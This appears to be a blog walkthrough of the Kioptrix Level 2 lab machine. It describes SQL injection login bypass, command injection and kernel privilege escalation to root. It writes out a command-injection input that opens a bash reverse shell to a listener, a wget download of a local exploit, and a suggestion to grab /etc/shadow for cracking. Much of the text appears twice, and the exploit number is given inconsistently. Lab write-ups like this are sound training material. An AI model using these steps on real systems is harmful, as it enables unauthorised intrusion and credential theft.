Kioptrix Level 2 Walkthrough
Kioptrix level 2 is a boot-to-root machine. Let's hack this machine!
Setup is same as kioptrix level 1. So first, we need to find the ip address of the machine.
So,192.168.56.103 is the ip address of the Kioptrix level 2 machine.
Let's run nmap scan: 192.168.56.103
As per our scan, we have SSH, a website , CUPS and MySql running.
I tried connecting to ssh, nothing happened. Also, I couldn't find the exploit for this version openssh.
Well, the website has a login form. Let's see if it is vulnerable for sql injection.
Boom!! We got in! This might be vulnerable for command injection. Let's try.
Well, it is vulnerable to command injection!! We have apache user permissions. So, we need to try escalate our privileges to root by using a local privilege escalation. For that, let's find the details of OS version and linux kernel.
So, we have know that linux kernel version is 2.6.9-55 and OS is CentOS 4.5.
Let's look for the exploit:
Let's try the exploit 9542.c
First step is to start a python server hosting the exploit.
Second step is to create a reverse shell using bash. Check out this link : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
We need to setup a listener using a netcat and execute the reverse shell code using command injection. ( your input should be "127.0.0.1;bash -i >& /dev/tcp/192.168.56.1/5000 0>&1" )
Yes , we got our shell,. Let's change to a directory where we have a written permission( /tmp) and use wget to download the exploit https://www.exploit-db.com/exploits/9545 which is hosted locally. Compile it and execute it.
We got the root!!!
It seems like the credentials of both john and admin accounts. We can use these credentials while logging into the website.
Setup is same as kioptrix level 1. So first, we need to find the ip address of the machine.
So,192.168.56.103 is the ip address of the Kioptrix level 2 machine.
Let's run nmap scan: 192.168.56.103
As per our scan, we have SSH, a website , CUPS and MySql running.
I tried connecting to ssh, nothing happened. Also, I couldn't find the exploit for this version openssh.
Website
Let's check out the website: http://192.168.56.103:80Well, the website has a login form. Let's see if it is vulnerable for sql injection.
Boom!! We got in! This might be vulnerable for command injection. Let's try.
Well, it is vulnerable to command injection!! We have apache user permissions. So, we need to try escalate our privileges to root by using a local privilege escalation. For that, let's find the details of OS version and linux kernel.
So, we have know that linux kernel version is 2.6.9-55 and OS is CentOS 4.5.
Let's look for the exploit:
Let's try the exploit 9542.c
First step is to start a python server hosting the exploit.
We need to setup a listener using a netcat and execute the reverse shell code using command injection. ( your input should be "127.0.0.1;bash -i >& /dev/tcp/192.168.56.1/5000 0>&1" )
Yes , we got our shell,. Let's change to a directory where we have a written permission( /tmp) and use wget to download the exploit https://www.exploit-db.com/exploits/9545 which is hosted locally. Compile it and execute it.
We got the root!!!
MYSQL
I could not really "hack" mysql but I did managed to find the login details of a user to mysql.
Let's check the database "webapp".
It seems like the credentials of both john and admin accounts. We can use these credentials while logging into the website.
Things to do
As usual, You can get /etc/passwd and /etc/shadow to crack the password. You can also add a user using your root shell and use that to login directly into the machine.
Comments
Post a Comment